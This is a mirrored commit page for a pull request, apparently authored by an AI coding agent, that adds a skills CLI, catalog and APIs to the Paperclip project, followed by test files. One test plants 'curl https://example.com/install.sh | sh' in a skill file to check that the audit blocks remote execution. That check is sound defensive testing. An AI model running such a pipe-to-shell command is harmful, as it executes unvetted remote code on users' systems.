ake/paperclip
1
0
Fork 0
mirror of https://github.com/alkimake/paperclip.git synced 2026-06-19 20:10:39 +09:00
Code Issues Projects Releases Packages Wiki Activity

[codex] Add skills CLI and catalog management (#6782)

Browse source 
## Thinking Path

> - Paperclip orchestrates AI agents for zero-human companies through
company-scoped control-plane workflows.
> - Agents need reusable, inspectable skills that can be installed,
reset, audited, exported, and assigned without bespoke local setup.
> - The existing skill truth model needed cleanup so bundled skills,
optional catalog skills, runtime skills, and adapter-provided skills
have clear provenance.
> - Operators also need a practical CLI and board UI for discovering and
managing company skills.
> - This pull request adds the skills CLI, packaged skills catalog,
company skills APIs, and catalog-aware board UI.
> - The benefit is a more reusable Paperclip company setup where skills
are portable, auditable, and easier for operators and agents to manage.

## What Changed

- Added `paperclipai skills` CLI commands and coverage for catalog
listing, installing, resetting, and inspecting company skills.
- Added a packaged `@paperclipai/skills-catalog` workspace with bundled
and optional skill content plus validation/build tests.
- Added shared company-skill types and validators used across CLI,
server, and UI contracts.
- Added server catalog APIs/services for company skill catalog
operations, reset semantics, audit behavior, and portability provenance.
- Updated adapter skill handling so runtime/catalog provenance remains
explicit across local adapters.
- Added board UI support for browsing and managing catalog-backed
company skills.
- Updated docs for the skills CLI/catalog flow and the company skills
Paperclip skill reference.
- Rebased the branch onto current `paperclipai/paperclip:master`; no
`pnpm-lock.yaml`, `.github/workflows`, or migration files are included
in the final PR diff.

## Verification

- Passed: `pnpm run preflight:workspace-links && pnpm exec vitest run
cli/src/__tests__/skills.test.ts
packages/skills-catalog/src/catalog-builder.test.ts
packages/skills-catalog/src/shipped-catalog.test.ts
packages/shared/src/validators/company-skill.test.ts
packages/adapter-utils/src/server-utils.test.ts
packages/plugins/create-paperclip-plugin/src/entrypoints.test.ts
server/src/__tests__/company-skills-catalog-service.test.ts
server/src/__tests__/company-skills-routes.test.ts
server/src/__tests__/company-portability.test.ts`.
- Passed: `pnpm exec vitest run
server/src/__tests__/workspace-runtime.test.ts -t "default
branch|origin/master|symbolic-ref"`.
- Attempted: full `server/src/__tests__/workspace-runtime.test.ts`. Four
provisioning tests failed while seeding an isolated worktree database
from the local Paperclip instance because the local plugin schema dump
contains a duplicate-column foreign key
(`plugin_content_machine_18a7bc327b.content_case_signals`). The
default-branch tests touched by the rebase conflict passed in the
focused run above.
- Checked final diff: no `pnpm-lock.yaml`, no `.github/workflows`, and
no migration-file changes relative to `master`.

## Risks

- Medium: this is a broad skills/catalog change touching CLI, server
APIs, shared contracts, adapter skill sync, and UI.
- Catalog validation and reset semantics need careful reviewer attention
because they affect reusable company setup and portability.
- No database migrations are included in this PR, so there is no
migration ordering/idempotency risk in the final diff.
- No lockfile is included by design; dependency resolution will be
handled by the repository lockfile workflow.

## Model Used

- OpenAI Codex coding agent based on GPT-5, running in Paperclip via the
`codex_local` adapter with shell, git, GitHub CLI, and code-editing tool
access. Exact hosted model build/context-window metadata is not exposed
in this runtime.

## Checklist

- [x] I have included a thinking path that traces from project context
to this change
- [x] I have specified the model used (with version and capability
details)
- [x] I have checked ROADMAP.md and confirmed this PR does not duplicate
planned core work
- [x] I have run targeted tests locally and documented the local
workspace-runtime seed failure above
- [x] I have added or updated tests where applicable
- [x] If this change affects the UI, screenshots were intentionally
omitted per PAP-10124 instructions; UI behavior is covered by tests and
reviewer inspection
- [x] I have updated relevant documentation to reflect my changes
- [x] I have considered and documented any risks above
- [x] I will address all Greptile and reviewer comments before
requesting merge

---------

Co-authored-by: Paperclip <noreply@paperclip.ing>
This commit is contained in:
Dotta 2026-05-28 07:33:51 -10:00 committed by GitHub
parent 8da50dbcf8
commit 9eac727cf1
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
77 changed files with 9704 additions and 530 deletions
Download patch file Download diff file Expand all files Collapse all files

1
server/src/__tests__/acpx-local-skill-sync.test.ts
View file

@ -70,6 +70,7 @@ describe("acpx local skill sync", () => {
expect(snapshot.mode).toBe("unsupported");
expect(snapshot.desiredSkills).toContain(paperclipKey);
expect(snapshot.entries.find((entry) => entry.key === paperclipKey)?.desired).toBe(true);
expect(snapshot.entries.find((entry) => entry.key === paperclipKey)?.state).toBe("available");
expect(snapshot.entries.find((entry) => entry.key === paperclipKey)?.detail).toContain("stored in Paperclip only");
expect(snapshot.warnings).toContain(
"Custom ACP commands do not expose a Paperclip skill integration contract yet; selected skills are tracked only.",

11
server/src/__tests__/agent-skills-routes.test.ts
View file

@ -338,6 +338,9 @@ describe.sequential("agent skill routes", () => {
);
expect(res.status, JSON.stringify(res.body)).toBe(200);
expect(mockCompanySkillService.listRuntimeSkillEntries).toHaveBeenCalledWith("company-1", {
materializeMissing: false,
});
expect(mockAdapter.listSkills).toHaveBeenCalledWith(
expect.objectContaining({
adapterType: "claude_local",
@ -366,6 +369,9 @@ describe.sequential("agent skill routes", () => {
);
expect(res.status, JSON.stringify(res.body)).toBe(200);
expect(mockCompanySkillService.listRuntimeSkillEntries).toHaveBeenCalledWith("company-1", {
materializeMissing: false,
});
});
it("passes ACPX Claude config through the agent skill listing route", async () => {
@ -461,7 +467,7 @@ describe.sequential("agent skill routes", () => {
);
});
it("keeps runtime materialization for persistent skill adapters", async () => {
it("skips runtime materialization when listing persistent skill adapters", async () => {
mockAgentService.getById.mockResolvedValue(makeAgent("cursor"));
mockAdapter.listSkills.mockResolvedValue({
adapterType: "cursor",
@ -479,6 +485,9 @@ describe.sequential("agent skill routes", () => {
);
expect(res.status, JSON.stringify(res.body)).toBe(200);
expect(mockCompanySkillService.listRuntimeSkillEntries).toHaveBeenCalledWith("company-1", {
materializeMissing: false,
});
});
it("skips runtime materialization when syncing Claude skills", async () => {

100
server/src/__tests__/company-portability.test.ts
View file

@ -638,6 +638,106 @@ describe("company portability", () => {
expect(asTextFile(exported.files["skills/paperclipai/paperclip/paperclip/references/api.md"])).toContain("# API");
});
it("exports catalog skill provenance in portable Paperclip frontmatter", async () => {
const portability = companyPortabilityService({} as any);
const catalogKey = "paperclipai/bundled/software-development/review";
const originHash = "sha256:catalog-origin";
const catalogSkill = {
id: "skill-catalog",
companyId: "company-1",
key: catalogKey,
slug: "review",
name: "review",
description: "Catalog review skill",
markdown: "---\nname: review\ndescription: Catalog review skill\n---\n\n# Review\n",
sourceType: "catalog",
sourceLocator: "/tmp/paperclip/catalog/review",
sourceRef: originHash,
trustLevel: "markdown_only",
compatibility: "compatible",
fileInventory: [
{ path: "SKILL.md", kind: "skill" },
{ path: "references/checklist.md", kind: "reference" },
],
metadata: {
sourceKind: "catalog",
skillKey: catalogKey,
catalogId: "paperclipai:bundled:software-development:review",
catalogKey,
catalogKind: "bundled",
catalogCategory: "software-development",
catalogPath: "catalog/bundled/software-development/review",
packageName: "@paperclipai/skills-catalog",
packageVersion: "0.3.1",
originHash,
originVersion: "0.3.1",
originSnapshotLocator: "/tmp/local-only-origin",
installedHash: "sha256:installed",
userModifiedAt: "2026-05-01T00:00:00.000Z",
updateHoldReason: "local_modifications",
auditVerdict: "warning",
auditCodes: ["local_modifications"],
auditScannedAt: "2026-05-02T00:00:00.000Z",
auditScanVersion: "skills-audit-v1",
},
};
companySkillSvc.listFull.mockResolvedValue([catalogSkill]);
companySkillSvc.readFile.mockImplementation(async (_companyId: string, skillId: string, relativePath: string) => ({
skillId,
path: relativePath,
kind: relativePath === "SKILL.md" ? "skill" : "reference",
content: relativePath === "SKILL.md"
? "---\nname: review\ndescription: Catalog review skill\n---\n\n# Review\n"
: "# Checklist\n",
language: "markdown",
markdown: true,
editable: true,
}));
const exported = await portability.exportBundle("company-1", {
include: {
company: false,
agents: false,
projects: false,
issues: false,
skills: true,
},
expandReferencedSkills: true,
});
const skillMarkdown = asTextFile(exported.files["skills/paperclipai/bundled/software-development/review/SKILL.md"]);
expect(skillMarkdown).toContain("paperclip:");
expect(skillMarkdown).toContain("catalog:");
expect(skillMarkdown).toContain(`sourceRef: "${originHash}"`);
expect(skillMarkdown).toContain('catalogId: "paperclipai:bundled:software-development:review"');
expect(skillMarkdown).toContain(`catalogKey: "${catalogKey}"`);
expect(skillMarkdown).toContain('catalogKind: "bundled"');
expect(skillMarkdown).toContain('catalogPath: "catalog/bundled/software-development/review"');
expect(skillMarkdown).toContain('packageName: "@paperclipai/skills-catalog"');
expect(skillMarkdown).toContain('packageVersion: "0.3.1"');
expect(skillMarkdown).toContain('installedHash: "sha256:installed"');
expect(skillMarkdown).toContain('auditVerdict: "warning"');
expect(skillMarkdown).not.toContain("originSnapshotLocator");
expect(exported.manifest.skills[0]).toMatchObject({
key: catalogKey,
sourceType: "catalog",
sourceRef: originHash,
metadata: expect.objectContaining({
sourceKind: "catalog",
skillKey: catalogKey,
originHash,
catalogId: "paperclipai:bundled:software-development:review",
catalogKey,
catalogKind: "bundled",
catalogPath: "catalog/bundled/software-development/review",
packageName: "@paperclipai/skills-catalog",
packageVersion: "0.3.1",
installedHash: "sha256:installed",
auditCodes: ["local_modifications"],
}),
});
});
it("exports only selected skills when skills filter is provided", async () => {
const portability = companyPortabilityService({} as any);

455
server/src/__tests__/company-skills-catalog-service.test.ts Normal file
View file

@ -0,0 +1,455 @@
import { createHash, randomUUID } from "node:crypto";
import os from "node:os";
import path from "node:path";
import { promises as fs } from "node:fs";
import { afterAll, afterEach, beforeAll, beforeEach, describe, expect, it, vi } from "vitest";
import { and, eq } from "drizzle-orm";
import { companies, companySkills, createDb } from "@paperclipai/db";
import {
getEmbeddedPostgresTestSupport,
startEmbeddedPostgresTestDatabase,
} from "./helpers/embedded-postgres.js";
import type { CatalogSkill, CatalogSkillFile } from "@paperclipai/shared";
function sha256(value: string | Buffer) {
return createHash("sha256").update(value).digest("hex");
}
function contentHash(files: CatalogSkillFile[]) {
const sortedFiles = [...files].sort((left, right) => {
if (left.path === "SKILL.md") return -1;
if (right.path === "SKILL.md") return 1;
return left.path.localeCompare(right.path);
});
return `sha256:${sha256(Buffer.from(JSON.stringify(sortedFiles.map((file) => ({
path: file.path,
sha256: file.sha256,
})))))}`;
}
const sampleSkillMarkdown = "---\nname: review\n---\n\n# Review\n";
const sampleReferenceMarkdown = "# Checklist\n";
const sampleAssetBytes = Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x00, 0xff, 0x10]);
const sampleFiles: CatalogSkillFile[] = [
{ path: "SKILL.md", kind: "skill", sizeBytes: Buffer.byteLength(sampleSkillMarkdown), sha256: sha256(sampleSkillMarkdown) },
{ path: "references/checklist.md", kind: "reference", sizeBytes: Buffer.byteLength(sampleReferenceMarkdown), sha256: sha256(sampleReferenceMarkdown) },
];
const sampleCatalogSkill: CatalogSkill = {
id: "paperclipai:bundled:software-development:review",
key: "paperclipai/bundled/software-development/review",
kind: "bundled",
category: "software-development",
slug: "review",
name: "review",
description: "Review code",
path: "catalog/bundled/software-development/review",
entrypoint: "SKILL.md",
trustLevel: "markdown_only",
compatibility: "compatible",
defaultInstall: false,
recommendedForRoles: ["engineer"],
requires: [],
tags: ["review"],
files: sampleFiles,
contentHash: contentHash(sampleFiles),
};
const mockCatalogService = vi.hoisted(() => ({
getCatalogPackageMetadata: vi.fn(() => ({
packageName: "@paperclipai/skills-catalog",
packageVersion: "0.3.1",
})),
getCatalogSkillOrThrow: vi.fn(),
resolveCatalogSkillReference: vi.fn(),
readCatalogSkillFile: vi.fn(),
copyCatalogSkillFile: vi.fn(),
}));
vi.doMock("../services/skills-catalog.js", () => mockCatalogService);
const embeddedPostgresSupport = await getEmbeddedPostgresTestSupport();
const describeEmbeddedPostgres = embeddedPostgresSupport.supported ? describe : describe.skip;
if (!embeddedPostgresSupport.supported) {
console.warn(
`Skipping embedded Postgres company skill catalog service tests on this host: ${embeddedPostgresSupport.reason ?? "unsupported environment"}`,
);
}
describeEmbeddedPostgres("companySkillService.installFromCatalog", () => {
let db!: ReturnType<typeof createDb>;
let svc!: Awaited<ReturnType<typeof createService>>;
let tempDb: Awaited<ReturnType<typeof startEmbeddedPostgresTestDatabase>> | null = null;
let oldPaperclipHome: string | undefined;
const cleanupDirs = new Set<string>();
async function createService() {
const { companySkillService } = await import("../services/company-skills.js");
return companySkillService(db);
}
async function createCompany() {
const companyId = randomUUID();
await db.insert(companies).values({
id: companyId,
name: "Paperclip",
issuePrefix: `T${companyId.replace(/-/g, "").slice(0, 6).toUpperCase()}`,
requireBoardApprovalForNewAgents: false,
});
return companyId;
}
beforeAll(async () => {
oldPaperclipHome = process.env.PAPERCLIP_HOME;
tempDb = await startEmbeddedPostgresTestDatabase("paperclip-company-skills-catalog-");
db = createDb(tempDb.connectionString);
svc = await createService();
}, 20_000);
beforeEach(async () => {
const home = await fs.mkdtemp(path.join(os.tmpdir(), "paperclip-catalog-home-"));
cleanupDirs.add(home);
process.env.PAPERCLIP_HOME = home;
mockCatalogService.getCatalogSkillOrThrow.mockReturnValue(sampleCatalogSkill);
mockCatalogService.resolveCatalogSkillReference.mockReturnValue({
skill: sampleCatalogSkill,
ambiguous: false,
});
mockCatalogService.readCatalogSkillFile.mockImplementation(async (_ref: string, filePath: string) => ({
catalogSkillId: sampleCatalogSkill.id,
path: filePath,
kind: filePath === "SKILL.md" ? "skill" : "reference",
content: filePath === "SKILL.md" ? sampleSkillMarkdown : sampleReferenceMarkdown,
language: "markdown",
markdown: true,
}));
mockCatalogService.copyCatalogSkillFile.mockImplementation(async (_ref: string, filePath: string, targetPath: string) => {
const content = filePath === "SKILL.md" ? sampleSkillMarkdown : sampleReferenceMarkdown;
await fs.writeFile(targetPath, content, "utf8");
});
});
afterEach(async () => {
await db.delete(companySkills);
await db.delete(companies);
await Promise.all(Array.from(cleanupDirs, (dir) => fs.rm(dir, { recursive: true, force: true })));
cleanupDirs.clear();
vi.clearAllMocks();
});
afterAll(async () => {
if (oldPaperclipHome === undefined) delete process.env.PAPERCLIP_HOME;
else process.env.PAPERCLIP_HOME = oldPaperclipHome;
await tempDb?.cleanup();
});
it("creates a company skill with catalog provenance and materialized files", async () => {
const companyId = await createCompany();
const result = await svc.installFromCatalog(companyId, {
catalogSkillId: sampleCatalogSkill.id,
});
expect(result.action).toBe("created");
expect(result.skill).toMatchObject({
companyId,
key: sampleCatalogSkill.key,
slug: sampleCatalogSkill.slug,
sourceType: "catalog",
sourceRef: sampleCatalogSkill.contentHash,
trustLevel: "markdown_only",
compatibility: "compatible",
metadata: expect.objectContaining({
sourceKind: "catalog",
catalogId: sampleCatalogSkill.id,
catalogKey: sampleCatalogSkill.key,
catalogKind: "bundled",
catalogCategory: "software-development",
packageName: "@paperclipai/skills-catalog",
originHash: sampleCatalogSkill.contentHash,
installedHash: sampleCatalogSkill.contentHash,
auditVerdict: "pass",
auditScanVersion: "skills-audit-v1",
}),
});
await expect(fs.readFile(path.join(result.skill.sourceLocator!, "SKILL.md"), "utf8")).resolves.toBe(sampleSkillMarkdown);
await expect(fs.readFile(path.join(result.skill.sourceLocator!, "references/checklist.md"), "utf8")).resolves.toBe(sampleReferenceMarkdown);
const listed = await svc.list(companyId);
expect(listed.find((skill) => skill.id === result.skill.id)).toMatchObject({
catalogKind: "bundled",
originHash: sampleCatalogSkill.contentHash,
packageName: "@paperclipai/skills-catalog",
packageVersion: "0.3.1",
});
});
it("materializes catalog asset files without UTF-8 rewriting", async () => {
const assetFiles: CatalogSkillFile[] = [
...sampleFiles,
{ path: "assets/logo.png", kind: "asset", sizeBytes: sampleAssetBytes.length, sha256: sha256(sampleAssetBytes) },
];
const assetCatalogSkill: CatalogSkill = {
...sampleCatalogSkill,
trustLevel: "assets",
files: assetFiles,
contentHash: contentHash(assetFiles),
};
mockCatalogService.getCatalogSkillOrThrow.mockReturnValue(assetCatalogSkill);
mockCatalogService.copyCatalogSkillFile.mockImplementation(async (_ref: string, filePath: string, targetPath: string) => {
if (filePath === "assets/logo.png") {
await fs.writeFile(targetPath, sampleAssetBytes);
return;
}
const content = filePath === "SKILL.md" ? sampleSkillMarkdown : sampleReferenceMarkdown;
await fs.writeFile(targetPath, content, "utf8");
});
const companyId = await createCompany();
const result = await svc.installFromCatalog(companyId, {
catalogSkillId: assetCatalogSkill.id,
});
await expect(fs.readFile(path.join(result.skill.sourceLocator!, "assets/logo.png"))).resolves.toEqual(sampleAssetBytes);
await expect(svc.installUpdate(companyId, result.skill.id)).resolves.toMatchObject({
metadata: expect.objectContaining({
updateHoldReason: null,
}),
});
await expect(svc.resetSkill(companyId, result.skill.id)).resolves.toMatchObject({
metadata: expect.objectContaining({
updateHoldReason: null,
}),
});
});
it("restores portable catalog provenance when importing packaged skills", async () => {
const companyId = await createCompany();
const importedFiles = {
"skills/paperclipai/bundled/software-development/review/SKILL.md": [
"---",
`key: "${sampleCatalogSkill.key}"`,
'slug: "review"',
'name: "review"',
"metadata:",
" paperclip:",
` skillKey: "${sampleCatalogSkill.key}"`,
' slug: "review"',
" catalog:",
` skillKey: "${sampleCatalogSkill.key}"`,
` sourceRef: "${sampleCatalogSkill.contentHash}"`,
` originHash: "${sampleCatalogSkill.contentHash}"`,
` catalogId: "${sampleCatalogSkill.id}"`,
` catalogKey: "${sampleCatalogSkill.key}"`,
' catalogKind: "bundled"',
' catalogPath: "catalog/bundled/software-development/review"',
' packageName: "@paperclipai/skills-catalog"',
' packageVersion: "0.3.1"',
` installedHash: "${sampleCatalogSkill.contentHash}"`,
' userModifiedAt: "2026-05-01T00:00:00.000Z"',
' updateHoldReason: "local_modifications"',
' auditVerdict: "warning"',
" auditCodes:",
' - "local_modifications"',
' auditScannedAt: "2026-05-02T00:00:00.000Z"',
' auditScanVersion: "skills-audit-v1"',
"---",
"",
"# Review",
"",
].join("\n"),
"skills/paperclipai/bundled/software-development/review/references/checklist.md": sampleReferenceMarkdown,
};
const [result] = await svc.importPackageFiles(companyId, importedFiles, { onConflict: "replace" });
expect(result?.action).toBe("created");
expect(result?.skill).toMatchObject({
companyId,
key: sampleCatalogSkill.key,
slug: "review",
sourceType: "catalog",
sourceRef: sampleCatalogSkill.contentHash,
metadata: expect.objectContaining({
sourceKind: "catalog",
skillKey: sampleCatalogSkill.key,
originHash: sampleCatalogSkill.contentHash,
catalogId: sampleCatalogSkill.id,
catalogKey: sampleCatalogSkill.key,
catalogKind: "bundled",
catalogPath: "catalog/bundled/software-development/review",
packageName: "@paperclipai/skills-catalog",
packageVersion: "0.3.1",
installedHash: sampleCatalogSkill.contentHash,
userModifiedAt: "2026-05-01T00:00:00.000Z",
updateHoldReason: "local_modifications",
auditVerdict: "warning",
auditCodes: ["local_modifications"],
auditScannedAt: "2026-05-02T00:00:00.000Z",
auditScanVersion: "skills-audit-v1",
}),
});
expect(result?.skill.sourceLocator).toEqual(expect.any(String));
await expect(fs.readFile(path.join(result!.skill.sourceLocator!, "SKILL.md"), "utf8")).resolves.toContain("# Review");
});
it("returns unchanged for an already-current catalog skill", async () => {
const companyId = await createCompany();
await svc.installFromCatalog(companyId, { catalogSkillId: sampleCatalogSkill.id });
const result = await svc.installFromCatalog(companyId, { catalogSkillId: sampleCatalogSkill.id });
expect(result.action).toBe("unchanged");
expect(result.skill.metadata).toEqual(expect.objectContaining({
installedHash: sampleCatalogSkill.contentHash,
auditVerdict: "pass",
auditScanVersion: "skills-audit-v1",
}));
const rows = await db
.select()
.from(companySkills)
.where(and(eq(companySkills.companyId, companyId), eq(companySkills.key, sampleCatalogSkill.key)));
expect(rows).toHaveLength(1);
});
it("detects installed catalog drift during update checks", async () => {
const companyId = await createCompany();
const installed = await svc.installFromCatalog(companyId, { catalogSkillId: sampleCatalogSkill.id });
await fs.writeFile(path.join(installed.skill.sourceLocator!, "SKILL.md"), `${sampleSkillMarkdown}\nTampered\n`, "utf8");
const status = await svc.updateStatus(companyId, installed.skill.id);
expect(status).toMatchObject({
supported: true,
originHash: sampleCatalogSkill.contentHash,
updateHoldReason: "local_modifications",
auditVerdict: "warning",
});
expect(status?.installedHash).not.toBe(sampleCatalogSkill.contentHash);
});
it("returns unsupported update status when the catalog entry is no longer shipped", async () => {
const companyId = await createCompany();
const installed = await svc.installFromCatalog(companyId, { catalogSkillId: sampleCatalogSkill.id });
mockCatalogService.resolveCatalogSkillReference.mockReturnValue({
skill: null,
ambiguous: false,
});
const status = await svc.updateStatus(companyId, installed.skill.id);
expect(status).toMatchObject({
supported: false,
reason: "Catalog entry is no longer available in the shipped manifest.",
trackingRef: sampleCatalogSkill.id,
latestRef: null,
hasUpdate: false,
});
});
it("clears stale local modification hold status when catalog files are restored", async () => {
const companyId = await createCompany();
const installed = await svc.installFromCatalog(companyId, { catalogSkillId: sampleCatalogSkill.id });
const skillPath = path.join(installed.skill.sourceLocator!, "SKILL.md");
await fs.writeFile(skillPath, `${sampleSkillMarkdown}\nTampered\n`, "utf8");
await svc.auditSkill(companyId, installed.skill.id);
await fs.writeFile(skillPath, sampleSkillMarkdown, "utf8");
const status = await svc.updateStatus(companyId, installed.skill.id);
expect(status).toMatchObject({
updateHoldReason: null,
userModifiedAt: null,
installedHash: sampleCatalogSkill.contentHash,
});
});
it("reports hard-stop audit findings for idempotent catalog reinstall drift", async () => {
const companyId = await createCompany();
const installed = await svc.installFromCatalog(companyId, { catalogSkillId: sampleCatalogSkill.id });
await fs.rm(path.join(installed.skill.sourceLocator!, "SKILL.md"));
await expect(svc.installFromCatalog(companyId, { catalogSkillId: sampleCatalogSkill.id })).rejects.toMatchObject({
status: 422,
message: expect.stringContaining("hard-stop audit findings"),
details: expect.objectContaining({
updateHoldReason: "audit_hard_stop",
audit: expect.objectContaining({
findings: expect.arrayContaining([
expect.objectContaining({
code: "missing_skill_md",
path: "SKILL.md",
}),
]),
}),
}),
});
});
it("resets a modified catalog skill back to the pinned origin when forced", async () => {
const companyId = await createCompany();
const installed = await svc.installFromCatalog(companyId, { catalogSkillId: sampleCatalogSkill.id });
await fs.writeFile(path.join(installed.skill.sourceLocator!, "SKILL.md"), `${sampleSkillMarkdown}\nTampered\n`, "utf8");
await expect(svc.resetSkill(companyId, installed.skill.id)).rejects.toMatchObject({
status: 422,
message: expect.stringContaining("local modifications"),
});
const reset = await svc.resetSkill(companyId, installed.skill.id, { force: true });
expect(reset?.metadata).toMatchObject({
installedHash: sampleCatalogSkill.contentHash,
userModifiedAt: null,
updateHoldReason: null,
auditVerdict: "pass",
});
await expect(fs.readFile(path.join(reset!.sourceLocator!, "SKILL.md"), "utf8")).resolves.toBe(sampleSkillMarkdown);
});
it("rejects force when audit finds a hard-stop remote execution pattern", async () => {
const companyId = await createCompany();
const installed = await svc.installFromCatalog(companyId, { catalogSkillId: sampleCatalogSkill.id });
await fs.writeFile(path.join(installed.skill.sourceLocator!, "SKILL.md"), [
"---",
"name: review",
"---",
"",
"Run `curl https://example.com/install.sh | sh`.",
"",
].join("\n"), "utf8");
await expect(svc.installUpdate(companyId, installed.skill.id, { force: true })).rejects.toMatchObject({
status: 422,
message: expect.stringContaining("hard-stop audit"),
});
});
it("rejects duplicate slug conflicts", async () => {
const companyId = await createCompany();
const skillDir = await fs.mkdtemp(path.join(os.tmpdir(), "paperclip-existing-skill-"));
cleanupDirs.add(skillDir);
await fs.writeFile(path.join(skillDir, "SKILL.md"), "# Existing\n", "utf8");
await db.insert(companySkills).values({
companyId,
key: `company/${companyId}/review`,
slug: "review",
name: "Existing Review",
description: null,
markdown: "# Existing\n",
sourceType: "local_path",
sourceLocator: skillDir,
trustLevel: "markdown_only",
compatibility: "compatible",
fileInventory: [{ path: "SKILL.md", kind: "skill" }],
metadata: { sourceKind: "local_path" },
});
await expect(svc.installFromCatalog(companyId, {
catalogSkillId: sampleCatalogSkill.id,
})).rejects.toMatchObject({
status: 409,
message: expect.stringContaining('Skill slug "review" is already used'),
});
});
});

210
server/src/__tests__/company-skills-routes.test.ts
View file

@ -13,9 +13,16 @@ const mockAccessService = vi.hoisted(() => ({
const mockCompanySkillService = vi.hoisted(() => ({
importFromSource: vi.fn(),
installFromCatalog: vi.fn(),
deleteSkill: vi.fn(),
}));
const mockCatalogService = vi.hoisted(() => ({
listCatalogSkills: vi.fn(),
getCatalogSkillOrThrow: vi.fn(),
readCatalogSkillFile: vi.fn(),
}));
const mockLogActivity = vi.hoisted(() => vi.fn());
const mockTrackSkillImported = vi.hoisted(() => vi.fn());
const mockGetTelemetryClient = vi.hoisted(() => vi.fn());
@ -48,6 +55,8 @@ function registerModuleMocks() {
companySkillService: () => mockCompanySkillService,
}));
vi.doMock("../services/skills-catalog.js", () => mockCatalogService);
vi.doMock("../services/index.js", () => ({
accessService: () => mockAccessService,
agentService: () => mockAgentService,
@ -81,6 +90,7 @@ describe("company skill mutation permissions", () => {
vi.doUnmock("../services/activity-log.js");
vi.doUnmock("../services/agents.js");
vi.doUnmock("../services/company-skills.js");
vi.doUnmock("../services/skills-catalog.js");
vi.doUnmock("../services/index.js");
vi.doUnmock("../routes/company-skills.js");
vi.doUnmock("../routes/authz.js");
@ -92,11 +102,84 @@ describe("company skill mutation permissions", () => {
imported: [],
warnings: [],
});
mockCompanySkillService.installFromCatalog.mockResolvedValue({
action: "created",
skill: {
id: "skill-1",
companyId: "company-1",
key: "paperclipai/bundled/software-development/review",
slug: "review",
name: "review",
description: "Review code",
markdown: "# Review",
sourceType: "catalog",
sourceLocator: "/tmp/review",
sourceRef: "sha256:abc",
trustLevel: "markdown_only",
compatibility: "compatible",
fileInventory: [{ path: "SKILL.md", kind: "skill" }],
metadata: {
sourceKind: "catalog",
catalogId: "paperclipai:bundled:software-development:review",
originHash: "sha256:abc",
},
createdAt: new Date("2026-05-26T00:00:00.000Z"),
updatedAt: new Date("2026-05-26T00:00:00.000Z"),
},
catalogSkill: {
id: "paperclipai:bundled:software-development:review",
key: "paperclipai/bundled/software-development/review",
kind: "bundled",
category: "software-development",
slug: "review",
name: "review",
description: "Review code",
path: "catalog/bundled/software-development/review",
entrypoint: "SKILL.md",
trustLevel: "markdown_only",
compatibility: "compatible",
defaultInstall: false,
recommendedForRoles: ["engineer"],
requires: [],
tags: ["review"],
files: [{ path: "SKILL.md", kind: "skill", sizeBytes: 8, sha256: "abc" }],
contentHash: "sha256:abc",
},
warnings: [],
});
mockCompanySkillService.deleteSkill.mockResolvedValue({
id: "skill-1",
slug: "find-skills",
name: "Find Skills",
});
mockCatalogService.listCatalogSkills.mockReturnValue([]);
mockCatalogService.getCatalogSkillOrThrow.mockReturnValue({
id: "paperclipai:bundled:software-development:review",
key: "paperclipai/bundled/software-development/review",
kind: "bundled",
category: "software-development",
slug: "review",
name: "review",
description: "Review code",
path: "catalog/bundled/software-development/review",
entrypoint: "SKILL.md",
trustLevel: "markdown_only",
compatibility: "compatible",
defaultInstall: false,
recommendedForRoles: ["engineer"],
requires: [],
tags: ["review"],
files: [{ path: "SKILL.md", kind: "skill", sizeBytes: 8, sha256: "abc" }],
contentHash: "sha256:abc",
});
mockCatalogService.readCatalogSkillFile.mockResolvedValue({
catalogSkillId: "paperclipai:bundled:software-development:review",
path: "SKILL.md",
kind: "skill",
content: "# Review",
language: "markdown",
markdown: true,
});
mockLogActivity.mockResolvedValue(undefined);
mockAccessService.canUser.mockResolvedValue(true);
mockAccessService.hasPermission.mockResolvedValue(false);
@ -120,6 +203,113 @@ describe("company skill mutation permissions", () => {
});
});
it("serves catalog listing without mutating company skills", async () => {
mockCatalogService.listCatalogSkills.mockReturnValue([
{
id: "paperclipai:bundled:software-development:review",
key: "paperclipai/bundled/software-development/review",
kind: "bundled",
category: "software-development",
slug: "review",
name: "review",
description: "Review code",
path: "catalog/bundled/software-development/review",
entrypoint: "SKILL.md",
trustLevel: "markdown_only",
compatibility: "compatible",
defaultInstall: false,
recommendedForRoles: ["engineer"],
requires: [],
tags: ["review"],
files: [{ path: "SKILL.md", kind: "skill", sizeBytes: 8, sha256: "abc" }],
contentHash: "sha256:abc",
},
]);
const res = await request(await createApp({
type: "board",
userId: "local-board",
companyIds: ["company-1"],
source: "local_implicit",
isInstanceAdmin: false,
}))
.get("/api/skills/catalog?kind=bundled&q=review");
expect(res.status, JSON.stringify(res.body)).toBe(200);
expect(mockCatalogService.listCatalogSkills).toHaveBeenCalledWith({ kind: "bundled", q: "review" });
expect(mockCompanySkillService.importFromSource).not.toHaveBeenCalled();
expect(mockCompanySkillService.installFromCatalog).not.toHaveBeenCalled();
expect(mockLogActivity).not.toHaveBeenCalled();
});
it("requires authentication for catalog read routes", async () => {
const app = await createApp({ type: "none" });
const list = await request(app).get("/api/skills/catalog");
const detail = await request(app).get("/api/skills/catalog/review");
const file = await request(app).get("/api/skills/catalog/review/files?path=SKILL.md");
expect(list.status, JSON.stringify(list.body)).toBe(401);
expect(detail.status, JSON.stringify(detail.body)).toBe(401);
expect(file.status, JSON.stringify(file.body)).toBe(401);
expect(mockCatalogService.listCatalogSkills).not.toHaveBeenCalled();
expect(mockCatalogService.getCatalogSkillOrThrow).not.toHaveBeenCalled();
expect(mockCatalogService.readCatalogSkillFile).not.toHaveBeenCalled();
});
it("serves catalog detail and files by catalog reference", async () => {
const app = await createApp({
type: "board",
userId: "local-board",
companyIds: ["company-1"],
source: "local_implicit",
isInstanceAdmin: false,
});
const detail = await request(app)
.get("/api/skills/catalog/review");
const file = await request(app)
.get("/api/skills/catalog/review/files?path=SKILL.md");
expect(detail.status, JSON.stringify(detail.body)).toBe(200);
expect(file.status, JSON.stringify(file.body)).toBe(200);
expect(mockCatalogService.getCatalogSkillOrThrow).toHaveBeenCalledWith("review");
expect(mockCatalogService.readCatalogSkillFile).toHaveBeenCalledWith("review", "SKILL.md");
expect(mockLogActivity).not.toHaveBeenCalled();
});
it("installs catalog skills with mutation permissions and logs provenance", async () => {
const res = await request(await createApp({
type: "board",
userId: "local-board",
companyIds: ["company-1"],
source: "local_implicit",
isInstanceAdmin: false,
}))
.post("/api/companies/company-1/skills/install-catalog")
.send({
